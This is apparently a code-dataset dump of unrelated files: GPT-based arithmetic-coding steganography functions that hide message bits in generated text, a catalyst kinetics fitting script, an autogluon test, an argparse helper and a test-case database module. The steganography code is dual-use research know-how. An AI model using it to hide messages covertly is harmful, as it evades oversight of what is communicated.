def encode_saac(model, enc, message, context, finish_sent=False, device='cuda', temp=1.0, precision=16, topk=50000, nucleus=0.95, verbose=False, with_case_study=False):
# print(f"message: {message}")
context = torch.tensor(context[-1022:], device=device, dtype=torch.long)
max_val = 2**precision
threshold = 2**(-precision)
cur_interval = [0, max_val] # bottom inclusive, top exclusive
prev = context
output = context
past = None
total_num = 0
total_num_for_stats = 0
total_log_probs = 0
total_kl = 0 # in bits
total_entropy_ptau = 0
topk_list = [] # save each step's selected topk
case_studies = [] # save each step's case study
max_step = 256
step_cnt = 0
with torch.no_grad():
i = 0
sent_finish = False
while i < len(message) or (finish_sent and not sent_finish):
step_cnt += 1
if verbose:
print(f"i: {i}")
print(f"cur_interval: {cur_interval}")
if step_cnt % 100 == 0:
print(f"Encode {step_cnt} steps")
logits, past = model(prev.unsqueeze(0), past=past)
past = limit_past(past)
logits[0, -1, -1] = -1e20 # endoftext token can't happen
logits[0, -1, 628] = -1e20 # 2 newlines token can't happen
logits, indices = logits[0, -1, :].sort(descending=True)
logits = logits.double()
logits_temp = logits / temp
probs_temp = F.softmax(logits_temp, dim=0)
log_probs_temp = F.log_softmax(logits_temp, dim=0)
log_probs = F.log_softmax(logits, dim=0)
# self-adjusting topk
cum_probs_temp = probs_temp.cumsum(0)
tmp = (cum_probs_temp >= nucleus).nonzero() # cannot be empty because nucleus<1
adaptive_topk = tmp[0].item()
# conditions for having reached the end of the message
if i >= len(message):
selection = 0
sent_finish = is_sent_finish(indices[selection].item(), enc)
else:
# Cutoff low probabilities that would be rounded to 0
cur_int_range = cur_interval[1]-cur_interval[0]
cur_threshold = 1/cur_int_range
tmp = (probs_temp < cur_threshold).nonzero()
if len(tmp) == 0:
k = max(topk, adaptive_topk)
else:
k = min(max(2, tmp[0].item()), max(topk, adaptive_topk))
probs_temp_int = probs_temp[:k] # Cutoff all but top k
topk_list.append(k)
# Rescale to correct range
probs_temp_int = probs_temp_int/probs_temp_int.sum()*cur_int_range
# Round probabilities to integers given precision
probs_temp_int = probs_temp_int.round().long()
cum_probs = probs_temp_int.cumsum(0)
# Remove any elements from the bottom if rounding caused the total prob to be too large
overfill_index = (cum_probs > cur_int_range).nonzero()
if len(overfill_index) > 0:
cum_probs = cum_probs[:overfill_index[0]]
# Add any mass to the top if removing/rounding causes the total prob to be too small
cum_probs[-1] += (cur_int_range-cum_probs[-1])
# Get out resulting probabilities
probs_final = cum_probs.clone()
probs_final[1:] = cum_probs[1:] - cum_probs[:-1]
# Convert to position in range
cum_probs += cur_interval[0]
# Get selected index based on binary fraction from message bits
message_bits = message[i:i+precision]
if i+precision > len(message):
message_bits = message_bits + [0]*(i+precision-len(message))
message_idx = bits2int(reversed(message_bits))
selection = (cum_probs > message_idx).nonzero()[0].item()
# Calculate new range as ints
new_int_bottom = cum_probs[selection-1] if selection > 0 else cur_interval[0]
new_int_top = cum_probs[selection]
# Convert range to bits
new_int_bottom_bits_inc = list(reversed(int2bits(new_int_bottom, precision)))
new_int_top_bits_inc = list(reversed(int2bits(new_int_top-1, precision))) # -1 here because upper bound is exclusive
# Consume most significant bits which are now fixed and update interval
num_bits_encoded = num_same_from_beg(new_int_bottom_bits_inc, new_int_top_bits_inc)
i += num_bits_encoded
new_int_bottom_bits = new_int_bottom_bits_inc[num_bits_encoded:] + [0]*num_bits_encoded
new_int_top_bits = new_int_top_bits_inc[num_bits_encoded:] + [1]*num_bits_encoded
cur_interval[0] = bits2int(reversed(new_int_bottom_bits))
cur_interval[1] = bits2int(reversed(new_int_top_bits))+1 # +1 here because upper bound is exclusive
# Gather statistics
total_log_probs += log_probs[selection].item()
q = probs_final.double()/probs_final.sum()
logq = q.log()
cur_kl = kl(q, logq, log_probs[:len(q)])
total_kl += cur_kl
total_entropy_ptau += entropy(probs_temp, log_probs_temp)
total_num_for_stats += 1
# Update history with new token
prev = indices[selection].view(1)
output = torch.cat((output, prev))
total_num += 1
#print(enc.decode(prev.tolist()), message_bits[:num_bits_encoded])
# temp_express = enc.decode(prev)
# For text->bits->text
partial = enc.decode(output[len(context):].tolist())
if '<eos>' in partial:
break
if with_case_study:
case_studies.append([step_cnt, k, cur_kl, partial])
# corners force to stop
if step_cnt >= max_step:
print("WARNING: reach maximum decoding steps")
break
avg_NLL = -total_log_probs/total_num_for_stats
avg_KL = total_kl/total_num_for_stats
avg_Hq = total_entropy_ptau/total_num_for_stats
words_per_bit = total_num_for_stats/i
return output[len(context):].tolist(), avg_NLL, avg_KL, words_per_bit, avg_Hq, topk_list, case_studies
def decode_saac(model, enc, text, context, device='cuda', temp=1.0, precision=16, topk=50000, nucleus=0.95):
# inp is a list of token indices
# context is a list of token indices
inp = enc.encode(text)
# common BPE error case: 198, 198 (2 newlines) is interpretted as 628 (2 newlines)
i = 0
while i < len(inp):
if inp[i] == 628:
inp[i] = 198
inp[i+1:i+1] = [198]
i += 2
else:
i += 1
context = torch.tensor(context[-1022:], device=device, dtype=torch.long)
max_val = 2**precision
threshold = 2**(-precision)
cur_interval = [0, max_val] # bottom inclusive, top exclusive
prev = context
past = None
message = []
with torch.no_grad():
i = 0
while i < len(inp):
logits, past = model(prev.unsqueeze(0), past=past) # logits of size (1, sequence_length, hidden_size),
past = limit_past(past)
logits[0, -1, -1] = -1e20 # endoftext can't happen
logits[0, -1, 628] = -1e20 # 2 newlines can't happen
logits, indices = logits[0, -1, :].sort(descending=True)
logits = logits.double()
logits_temp = logits / temp
probs_temp = F.softmax(logits_temp, dim=0)
# self-adjusting topk
cum_probs_temp = probs_temp.cumsum(0)
tmp = (cum_probs_temp >= nucleus).nonzero()
adaptive_topk = tmp[0].item()
# Cutoff low probabilities that would be rounded to 0
cur_int_range = cur_interval[1]-cur_interval[0]
cur_threshold = 1/cur_int_range
tmp = (probs_temp < cur_threshold).nonzero()
if len(tmp) == 0:
k = max(topk, adaptive_topk)
else:
k = min(max(2, tmp[0].item()), max(topk, adaptive_topk))
probs_temp_int = probs_temp[:k] # Cutoff all but top k
# Rescale to correct range
probs_temp_int = probs_temp_int/probs_temp_int.sum()*cur_int_range
# Round probabilities to integers given precision
probs_temp_int = probs_temp_int.round().long()
cum_probs = probs_temp_int.cumsum(0)
# Remove any elements from the bottom if rounding caused the total prob to be too large
overfill_index = (cum_probs > cur_int_range).nonzero()
if len(overfill_index) > 0:
cum_probs = cum_probs[:overfill_index[0]]
k = overfill_index[0].item()
# Add any mass to the top if removing/rounding causes the total prob to be too small
cum_probs[-1] += cur_int_range-cum_probs[-1]
# Convert to position in range
cum_probs += cur_interval[0]
### This is where we find the range of i-th subword ###
rank = (indices == inp[i]).nonzero().item()
# Handle most errors that could happen because of BPE with heuristic
if rank >= k:
true_token_text = enc.decoder[inp[i]]
for rank_idx in range(k):
prop_token_text = enc.decoder[indices[rank_idx].item()]
# common case that is not caught
if inp[i] == 128 and indices[rank_idx] == 198:
rank = rank_idx
inp[i] = indices[rank_idx].item()
break
# Is there a more likely prefix token that could be the actual token generated?
if len(prop_token_text) <= len(true_token_text) and \
prop_token_text == true_token_text[:len(prop_token_text)]:
rank = rank_idx
suffix = true_token_text[len(prop_token_text):]
suffix_tokens = enc.encode(suffix) # a list
inp[i] = indices[rank_idx].item()
inp[i+1:i+1] = suffix_tokens # insert suffix tokens into list
break
# Is there a more likely longer token that could be the actual token generated?
elif len(prop_token_text) > len(true_token_text) and \
true_token_text == prop_token_text[:len(true_token_text)]:
whole_text = true_token_text
num_extra = 1
while len(whole_text) < len(prop_token_text):
whole_text += enc.decoder[inp[i+num_extra]]
num_extra += 1
if prop_token_text == whole_text[:len(prop_token_text)]:
rank = rank_idx
inp[i] = indices[rank_idx].item()
for j in range(1, num_extra):
del inp[i+j]
if len(whole_text) > len(prop_token_text):
suffix = whole_text[len(prop_token_text):]
suffix_tokens = enc.encode(suffix) # a list
inp[i+1:i+1] = suffix_tokens # insert suffix tokens into list
break
else:
print('Unable to fix BPE error: token received: %s=%d, text: %s' % (true_token_text, inp[i], text))
rank = 0
selection = rank
# Calculate new range as ints
new_int_bottom = cum_probs[selection-1] if selection > 0 else cur_interval[0]
new_int_top = cum_probs[selection]
# Convert range to bits
new_int_bottom_bits_inc = list(reversed(int2bits(new_int_bottom, precision)))
new_int_top_bits_inc = list(reversed(int2bits(new_int_top-1, precision))) # -1 here because upper bound is exclusive
# Emit most significant bits which are now fixed and update interval
num_bits_encoded = num_same_from_beg(new_int_bottom_bits_inc, new_int_top_bits_inc)
if i == len(inp)-1:
new_bits = new_int_bottom_bits_inc
else:
new_bits = new_int_top_bits_inc[:num_bits_encoded]
message += new_bits
new_int_bottom_bits = new_int_bottom_bits_inc[num_bits_encoded:] + [0]*num_bits_encoded
new_int_top_bits = new_int_top_bits_inc[num_bits_encoded:] + [1]*num_bits_encoded
cur_interval[0] = bits2int(reversed(new_int_bottom_bits))
cur_interval[1] = bits2int(reversed(new_int_top_bits))+1 # +1 here because upper bound is exclusive
# Update history with new token
prev = torch.tensor([inp[i]], device=device, dtype=torch.long)
#print(enc.decode([inp[i]]), new_bits)
i += 1
return message
| 44.701639
| 168
| 0.564618
|
24970388fdb18d5eb50ade534b3a2c84375447d9
| 5,751
|
py
|
Python
|
scripts/python/catalyst/updatedTWC/load_iso-octane.py
|
coelectrolyzer/cats
|
21f8e6f5f176767ec403ad2738c80a5a71fba959
|
[
"MIT"
] | 1
|
2022-02-17T16:37:12.000Z
|
2022-02-17T16:37:12.000Z
|
scripts/python/catalyst/updatedTWC/load_iso-octane.py
|
coelectrolyzer/cats
|
21f8e6f5f176767ec403ad2738c80a5a71fba959
|
[
"MIT"
] | 5
|
2021-10-30T00:06:31.000Z
|
2022-03-09T13:34:07.000Z
|
scripts/python/catalyst/updatedTWC/load_iso-octane.py
|
coelectrolyzer/cats
|
21f8e6f5f176767ec403ad2738c80a5a71fba959
|
[
"MIT"
] | 3
|
2021-05-08T02:26:08.000Z
|
2022-03-01T22:27:40.000Z
|
# This file is a demo for the 'Isothermal_Monolith_Simulator' object
import sys
sys.path.append('../..')
from catalyst.isothermal_monolith_catalysis import *
# Give x, y, z for the HC (CxHyOz)
HC_name = "iso-octane"
run = "02"
oldrun="01"
readfile = 'output/'+HC_name+'_model'+oldrun+'.json'
writefile = HC_name+"_model"+run+".json"
sim = Isothermal_Monolith_Simulator()
sim.load_model_full(readfile, reset_param_bounds=True)
# CO + 0.5 O2 --> CO2
#"r1": ReactionType.Arrhenius,
# H2 + 0.5 O2 --> H2O
#"r2": ReactionType.Arrhenius,
# CO + NO --> CO2 (+ 0.5 N2)
#"r4": ReactionType.Arrhenius,
# CO + 2 NO --> CO2 + N2O
#"r5": ReactionType.Arrhenius,
# 2.5 CO + NO + 1.5 H2O --> 2.5 CO2 + NH3
#"r8": ReactionType.Arrhenius,
# CO + H2O <-- --> CO2 + H2
#"r11": ReactionType.EquilibriumArrhenius,
# 2.5 H2 + NO --> NH3 + H2O
#"r6": ReactionType.Arrhenius,
# H2 + NO --> H2O (+ 0.5 N2)
#"r7": ReactionType.Arrhenius,
# H2 + 2 NO --> N2O + H2O
#"r14": ReactionType.Arrhenius,
# NH3 + NO + 0.25 O2 --> 1.5 H2O (+ N2)
#"r15": ReactionType.Arrhenius,
# HC oxidation
# CxHyOz + (x + (y/4) - (z/2)) O2 --> x CO2 + (y/2) H2O
#"r3": ReactionType.Arrhenius,
# HC Steam Reforming
# CxHyOz + (x-z) H2O --> x CO + (x + (y/2) - z) H2
#"r12": ReactionType.Arrhenius,
# HC NO reduction
# CxHyOz + (2x + (y/2) - z) NO --> x CO2 + (y/2) H2O + (x + (y/4) - (z/2)) N2
#"r10": ReactionType.Arrhenius,
sim.fix_all_reactions()
# NOTE: If the rates are "inhibited", then we want the activation energies to increase
# CO/O2 (opt this first)
rxn = "r1"
#sim.unfix_reaction(rxn)
#sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.99, sim.model.E[rxn].value*1.2))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.99, sim.model.A[rxn].value*2))
# CO/NO
rxn = "r4"
#sim.unfix_reaction("r4")
#sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.99, sim.model.E[rxn].value*1.2))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.99, sim.model.A[rxn].value*2))
rxn = "r5"
#sim.unfix_reaction("r5")
#sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[multrxn].value*0.99, sim.model.E[rxn].value*1.2))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.99, sim.model.A[rxn].value*2))
rxn = "r8"
#sim.unfix_reaction("r8")
#sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.99, sim.model.E[rxn].value*1.2))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.99, sim.model.A[rxn].value*2))
# H2/NO (Don't let these vary?)
#sim.unfix_reaction("r6")
#sim.unfix_reaction("r7")
#sim.unfix_reaction("r14")
# HC reactions
rxn = "r3"
sim.unfix_reaction("r3")
sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.9, sim.model.E[rxn].value*1.1))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.5, sim.model.A[rxn].value*2))
rxn = "r10"
sim.unfix_reaction("r10")
sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.9, sim.model.E[rxn].value*1.1))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.5, sim.model.A[rxn].value*2))
rxn = "r12"
sim.unfix_reaction("r12")
sim.set_reaction_param_bounds(rxn, "E", bounds=(sim.model.E[rxn].value*0.9, sim.model.E[rxn].value*1.1))
#sim.set_reaction_param_bounds(rxn, "A", bounds=(sim.model.A[rxn].value*0.5, sim.model.A[rxn].value*2))
# ========== Selecting weight factors
sim.auto_select_all_weight_factors()
sim.ignore_weight_factor("N2O","A0","T0",time_window=(0,110))
sim.ignore_weight_factor("CO","A0","T0",time_window=(0,110))
#sim.ignore_weight_factor("NO","A0","T0",time_window=(0,110))
# ignore this temporarily
#sim.ignore_weight_factor("NH3","A0","T0",time_window=(0,110))
#sim.set_weight_factor_multiplier("NH3", "A0", "T0", 0.5)
#sim.ignore_weight_factor("HC","A0","T0",time_window=(0,30))
#sim.ignore_weight_factor("HC","A0","T0",time_window=(50,110))
sim.finalize_auto_scaling()
# Stop at 39 iter if needed
#my_options={'max_iter': 39}
#sim.run_solver(options=my_options)
sim.run_solver()
name = HC_name+"_CO"
sim.plot_vs_data("CO", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_NO"
sim.plot_vs_data("NO", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_HC"
sim.plot_vs_data("HC", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_NH3"
sim.plot_vs_data("NH3", "A0", "T0", 5, display_live=False, file_name=name)
name = HC_name+"_N2O"
sim.plot_vs_data("N2O", "A0", "T0", 5, display_live=False, file_name=name)
sim.plot_at_times(["CO"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_CO-profile-out")
sim.plot_at_times(["O2"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_O2-profile-out")
sim.plot_at_times(["HC"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_HC-profile-out")
sim.plot_at_times(["NO"], ["A0"], ["T0"], [30, 35, 40, 45, 50],
display_live=False, file_name=HC_name+"_NO-profile-out")
sim.plot_at_locations(["O2"], ["A0"], ["T0"], [0, 5], display_live=False, file_name=HC_name+"_O2-out")
sim.plot_at_locations(["H2"], ["A0"], ["T0"], [0, 5], display_live=False, file_name=HC_name+"_H2-out")
sim.print_results_of_breakthrough(["HC","CO","NO","NH3","N2O","H2","O2","H2O"],
"A0", "T0", file_name=HC_name+"_lightoff.txt", include_temp=True)
sim.print_results_of_integral_average(["CO","NO","HC"], "A0", "T0", file_name=HC_name+"_avgs-used-for-inhibition.txt")
sim.print_kinetic_parameter_info(file_name=HC_name+"_params"+run+".txt")
sim.save_model_state(file_name=writefile)
| 34.232143
| 118
| 0.670666
|
4f99da330112201a5a8e091228d1419e2fe9fab8
| 1,482
|
py
|
Python
|
tests/unittests/utils/tabular/features/generators/test_text_ngram.py
|
NunoEdgarGFlowHub/autogluon
|
714894698495ef4352706d3c4250823ad4a43ead
|
[
"Apache-2.0"
] | null | null | null |
tests/unittests/utils/tabular/features/generators/test_text_ngram.py
|
NunoEdgarGFlowHub/autogluon
|
714894698495ef4352706d3c4250823ad4a43ead
|
[
"Apache-2.0"
] | null | null | null |
tests/unittests/utils/tabular/features/generators/test_text_ngram.py
|
NunoEdgarGFlowHub/autogluon
|
714894698495ef4352706d3c4250823ad4a43ead
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from autogluon.utils.tabular.features.generators import TextNgramFeatureGenerator
def test_text_ngram_feature_generator(generator_helper, data_helper):
# Given
input_data = data_helper.generate_multi_feature_full()
toy_vectorizer = CountVectorizer(min_df=2, ngram_range=(1, 3), max_features=10, dtype=np.uint8)
# max_memory_ratio=None in test to avoid CI reducing ngrams non-deterministically.
generator = TextNgramFeatureGenerator(max_memory_ratio=None, vectorizer=toy_vectorizer)
expected_feature_metadata_in_full = {
('object', ('text',)): ['text'],
}
expected_feature_metadata_full = {('int', ('text_ngram',)): [
'__nlp__.breaks',
'__nlp__.end',
'__nlp__.end of',
'__nlp__.end of the',
'__nlp__.of',
'__nlp__.sentence',
'__nlp__.sentence breaks',
'__nlp__.the',
'__nlp__.the end',
'__nlp__.world',
'__nlp__._total_'
]}
expected_output_data_feat_total = [1, 3, 0, 0, 7, 1, 3, 7, 3]
# When
output_data = generator_helper.fit_transform_assert(
input_data=input_data,
generator=generator,
expected_feature_metadata_in_full=expected_feature_metadata_in_full,
expected_feature_metadata_full=expected_feature_metadata_full,
)
assert expected_output_data_feat_total == list(output_data['__nlp__._total_'].values)
| 32.933333
| 99
| 0.703104
|
7234a37106ec1e3adbbe32fa33e16fc1c5d3aeaf
| 1,093
|
py
|
Python
|
src/python/utils/args_parsers.py
|
lvrcek/consensus-net
|
560957f315751822e1ddf8c097eb7b712ceadff3
|
[
"MIT"
] | null | null | null |
src/python/utils/args_parsers.py
|
lvrcek/consensus-net
|
560957f315751822e1ddf8c097eb7b712ceadff3
|
[
"MIT"
] | null | null | null |
src/python/utils/args_parsers.py
|
lvrcek/consensus-net
|
560957f315751822e1ddf8c097eb7b712ceadff3
|
[
"MIT"
] | 1
|
2018-12-23T13:50:29.000Z
|
2018-12-23T13:50:29.000Z
|
import argparse
def parse_train_args(args):
"""
Parses arguments for model training.
Arguments should be passed just like 'sys.argv[1:]'.
Needed arguments are X_train_path, y_train_path, X_validate_path,
y_validate_path and model_save_path.
:param args: list of args from sys.argv[1:]
:type args: list of str
:return: parsed arguments for training
:rtype: Namespace
"""
parser = argparse.ArgumentParser()
parser.add_argument('X_train', type=str, help='X_train path.')
parser.add_argument('y_train', type=str, help='y_train path.')
parser.add_argument('X_validate', type=str, help='X_validate path.')
parser.add_argument('y_validate', type=str, help='y_validate path.')
parser.add_argument('model_save_path', type=str,
help='Path for trained model saving.')
parser.add_argument('tensorboard_output_dir', type=str,
help='Path for Tensorboard output data.')
parser.add_argument('--class-weights', type=str, help='Class weights path.')
return parser.parse_args(args)
| 36.433333
| 80
| 0.686185
|
2aa05d507a13ea2276643dbf2ac90ea12fd03d10
| 14,748
|
py
|
Python
|
app/crud/test_case/TestCaseDao.py
|
yst8493182/pity
|
7b2f6092dc0be2032e70b45a68b662426928e327
|
[
"Apache-2.0"
] | null | null | null |
app/crud/test_case/TestCaseDao.py
|
yst8493182/pity
|
7b2f6092dc0be2032e70b45a68b662426928e327
|
[
"Apache-2.0"
] | null | null | null |
app/crud/test_case/TestCaseDao.py
|
yst8493182/pity
|
7b2f6092dc0be2032e70b45a68b662426928e327
|
[
"Apache-2.0"
] | null | null | null |
import json
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Dict
from sqlalchemy import desc, func, and_, asc
from sqlalchemy.future import select
from app.crud import Mapper
from app.crud.test_case.ConstructorDao import ConstructorDao
from app.crud.test_case.TestCaseAssertsDao import TestCaseAssertsDao
from app.crud.test_case.TestCaseDirectory import PityTestcaseDirectoryDao
from app.crud.test_case.TestcaseDataDao import PityTestcaseDataDao
from app.middleware.RedisManager import RedisHelper
from app.models import Session, DatabaseHelper, async_session
from app.models.constructor import Constructor
from app.models.schema.testcase_schema import TestCaseForm
from app.models.test_case import TestCase
from app.models.user import User
from app.utils.decorator import dao
from app.utils.logger import Log
from config import Config
@dao(TestCase, Log("TestCaseDao"))
class TestCaseDao(Mapper):
log = Log("TestCaseDao")
@classmethod
async def list_test_case(cls, directory_id: int = None, name: str = "", create_user: str = None):
try:
filters = [TestCase.deleted_at == 0]
if directory_id:
parents = await PityTestcaseDirectoryDao.get_directory_son(directory_id)
filters = [TestCase.deleted_at == 0, TestCase.directory_id.in_(parents)]
if name:
filters.append(TestCase.name.like(f"%{name}%"))
if create_user:
filters.append(TestCase.create_user == create_user)
async with async_session() as session:
sql = select(TestCase).where(*filters).order_by(TestCase.name.asc())
result = await session.execute(sql)
return result.scalars().all()
except Exception as e:
cls.log.error(f"获取测试用例失败: {str(e)}")
raise Exception(f"获取测试用例失败: {str(e)}")
@staticmethod
async def get_test_case_by_directory_id(directory_id: int):
try:
async with async_session() as session:
sql = select(TestCase).where(TestCase.deleted_at == 0,
TestCase.directory_id == directory_id).order_by(TestCase.name.asc())
result = await session.execute(sql)
ans = []
case_map = dict()
for item in result.scalars():
ans.append({"title": item.name, "key": "testcase_{}".format(item.id)})
case_map[item.id] = item.name
return ans, case_map
except Exception as e:
TestCaseDao.log.error(f"获取测试用例失败: {str(e)}")
raise Exception(f"获取测试用例失败: {str(e)}")
@staticmethod
def get_tree(case_list):
result = defaultdict(list)
# 获取目录->用例的映射关系
for cs in case_list:
result[cs.catalogue].append(cs)
keys = sorted(result.keys())
tree = [dict(key=f"cat_{key}",
children=[{"key": f"case_{child.id}", "title": child.name,
"total": TestCaseDao.get_case_children_length(child.id),
"children": TestCaseDao.get_case_children(child.id)} for child in result[key]],
title=key, total=len(result[key])) for key in keys]
return tree
@staticmethod
def get_case_children(case_id: int):
data, err = TestCaseAssertsDao.list_test_case_asserts(case_id)
if err:
raise err
return [dict(key=f"asserts_{d.id}", title=d.name, case_id=case_id) for d in data]
@staticmethod
def get_case_children_length(case_id: int):
data, err = TestCaseAssertsDao.list_test_case_asserts(case_id)
if err:
raise err
return len(data)
# @staticmethod
# def insert_test_case(test_case, user):
# """
#
# :param user: 创建人
# :param test_case: 测试用例
# :return:
# """
# try:
# with Session() as session:
# data = session.query(TestCase).filter_by(name=test_case.get("name"),
# directory_id=test_case.get("directory_id"),
# deleted_at=0).first()
# if data is not None:
# raise Exception("用例已存在")
# cs = TestCase(**test_case, create_user=user)
# session.add(cs)
# session.commit()
# session.refresh(cs)
# return cs.id
# except Exception as e:
# TestCaseDao.log.error(f"添加用例失败: {str(e)}")
# raise Exception(f"添加用例失败: {str(e)}")
@staticmethod
def update_test_case(test_case: TestCaseForm, user):
"""
:param user: 修改人
:param test_case: 测试用例
:return:
"""
try:
with Session() as session:
data = session.query(TestCase).filter_by(id=test_case.id, deleted_at=0).first()
if data is None:
raise Exception("用例不存在")
DatabaseHelper.update_model(data, test_case, user)
session.commit()
session.refresh(data)
return data
except Exception as e:
TestCaseDao.log.error(f"编辑用例失败: {str(e)}")
raise Exception(f"编辑用例失败: {str(e)}")
@staticmethod
async def query_test_case(case_id: int) -> dict:
try:
async with async_session() as session:
sql = select(TestCase).where(TestCase.id == case_id, TestCase.deleted_at == 0)
result = await session.execute(sql)
data = result.scalars().first()
if data is None:
raise Exception("用例不存在")
# 获取断言部分
asserts, _ = await TestCaseAssertsDao.async_list_test_case_asserts(data.id)
# 获取数据构造器
constructors = await ConstructorDao.list_constructor(case_id)
constructors_case = await TestCaseDao.query_test_case_by_constructors(constructors)
test_data = await PityTestcaseDataDao.list_testcase_data(case_id)
return dict(asserts=asserts, constructors=constructors, case=data, constructors_case=constructors_case,
test_data=test_data)
except Exception as e:
TestCaseDao.log.error(f"查询用例失败: {str(e)}")
raise Exception(f"查询用例失败: {str(e)}")
@staticmethod
async def query_test_case_by_constructors(constructors: List[Constructor]):
try:
# 找到所有用例名称为
constructors = [json.loads(x.constructor_json).get("case_id") for x in constructors if x.type == 0]
async with async_session() as session:
sql = select(TestCase).where(TestCase.id.in_(constructors), TestCase.deleted_at == 0)
result = await session.execute(sql)
data = result.scalars().all()
return {x.id: x for x in data}
except Exception as e:
TestCaseDao.log.error(f"查询用例失败: {str(e)}")
raise Exception(f"查询用例失败: {str(e)}")
@staticmethod
async def async_query_test_case(case_id) -> [TestCase, str]:
try:
async with async_session() as session:
result = await session.execute(
select(TestCase).where(TestCase.id == case_id, TestCase.deleted_at == 0))
data = result.scalars().first()
if data is None:
return None, "用例不存在"
return data, None
except Exception as e:
TestCaseDao.log.error(f"查询用例失败: {str(e)}")
return None, f"查询用例失败: {str(e)}"
@staticmethod
def list_testcase_tree(projects) -> [List, dict]:
try:
result = []
project_map = {}
project_index = {}
for p in projects:
project_map[p.id] = p.name
result.append({
"label": p.name,
"value": p.id,
"key": p.id,
"children": [],
})
project_index[p.id] = len(result) - 1
with Session() as session:
data = session.query(TestCase).filter(TestCase.project_id.in_(project_map.keys()),
TestCase.deleted_at == 0).all()
for d in data:
result[project_index[d.project_id]]["children"].append({
"label": d.name,
"value": d.id,
"key": d.id,
})
return result
except Exception as e:
TestCaseDao.log.error(f"获取用例列表失败: {str(e)}")
raise Exception("获取用例列表失败")
@staticmethod
def select_constructor(case_id: int):
"""
通过case_id获取用例构造数据
:param case_id:
:return:
"""
try:
with Session() as session:
data = session.query(Constructor).filter_by(case_id=case_id, deleted_at=0).order_by(
desc(Constructor.created_at)).all()
return data
except Exception as e:
TestCaseDao.log.error(f"查询构造数据失败: {str(e)}")
@staticmethod
async def async_select_constructor(case_id: int) -> List[Constructor]:
"""
异步获取用例构造数据
:param case_id:
:return:
"""
try:
async with async_session() as session:
sql = select(Constructor).where(Constructor.case_id == case_id,
Constructor.deleted_at == 0).order_by(Constructor.created_at)
data = await session.execute(sql)
return data.scalars().all()
except Exception as e:
TestCaseDao.log.error(f"查询构造数据失败: {str(e)}")
@staticmethod
async def collect_data(case_id: int, data: List):
"""
收集以case_id为前置条件的数据(后置暂时不支持)
:param data:
:param case_id:
:return:
"""
# 先获取数据构造器(前置条件)
pre = dict(id=f"pre_{case_id}", label="前置条件", children=list())
suffix = dict(id=f"suffix_{case_id}", label="后置条件", children=list())
await TestCaseDao.collect_constructor(case_id, pre, suffix)
data.append(pre)
# 获取断言
asserts = dict(id=f"asserts_{case_id}", label="断言", children=list())
await TestCaseDao.collect_asserts(case_id, asserts)
data.append(asserts)
data.append(suffix)
@staticmethod
async def collect_constructor(case_id, parent, suffix):
constructors = await TestCaseDao.async_select_constructor(case_id)
for c in constructors:
temp = dict(id=f"constructor_{c.id}", label=f"{c.name}", children=list())
if c.type == Config.ConstructorType.testcase:
# 说明是用例,继续递归
temp["label"] = "[CASE]: " + temp["label"]
json_data = json.loads(c.constructor_json)
await TestCaseDao.collect_data(json_data.get("case_id"), temp.get("children"))
elif c.type == Config.ConstructorType.sql:
temp["label"] = "[SQL]: " + temp["label"]
elif c.type == Config.ConstructorType.redis:
temp["label"] = "[REDIS]: " + temp["label"]
elif c.type == Config.ConstructorType.py_script:
temp["label"] = "[PyScript]: " + temp["label"]
# 否则正常添加数据
if c.suffix:
suffix.get("children").append(temp)
else:
parent.get("children").append(temp)
@staticmethod
async def collect_asserts(case_id, parent):
asserts, err = await TestCaseAssertsDao.async_list_test_case_asserts(case_id)
if err:
raise Exception("获取断言数据失败")
for a in asserts:
temp = dict(id=f"assert_{a.id}", label=f"{a.name}", children=list())
parent.get("children").append(temp)
@staticmethod
async def get_xmind_data(case_id: int):
# result = dict()
data = await TestCaseDao.query_test_case(case_id)
cs = data.get("case")
# 开始解析测试数据
result = dict(id=f"case_{case_id}", label=f"{cs.name}({cs.id})")
children = list()
await TestCaseDao.collect_data(case_id, children)
result["children"] = children
return result
@staticmethod
@RedisHelper.cache("rank")
async def query_user_case_list() -> Dict[str, List]:
"""
created by woody at 2022-02-13 12:59
查询用户case数量和排名
:return:
"""
ans = dict()
async with async_session() as session:
async with session.begin():
sql = select(TestCase.create_user, func.count(TestCase.id)) \
.outerjoin(User, and_(User.deleted_at == 0, TestCase.create_user == User.id)).where(
TestCase.deleted_at == 0).group_by(TestCase.create_user).order_by(
desc(func.count(TestCase.id)))
query = await session.execute(sql)
for i, q in enumerate(query.all()):
user, count = q
ans[str(user)] = [count, i + 1]
return ans
@staticmethod
async def query_weekly_user_case(user_id: int, start_time: datetime, end_time: datetime) -> List:
ans = dict()
async with async_session() as session:
async with session.begin():
date_ = func.date_format(TestCase.created_at, "%Y-%m-%d")
sql = select(date_, func.count(TestCase.id)).where(
TestCase.create_user == user_id,
TestCase.deleted_at == 0, TestCase.created_at.between(start_time, end_time)).group_by(
date_).order_by(asc(date_))
query = await session.execute(sql)
for i, q in enumerate(query.all()):
date, count = q
ans[date] = count
return await TestCaseDao.fill_data(start_time, end_time, ans)
@staticmethod
async def fill_data(start_time: datetime, end_time: datetime, data: dict):
"""
填补数据
:param data:
:param start_time:
:param end_time:
:return:
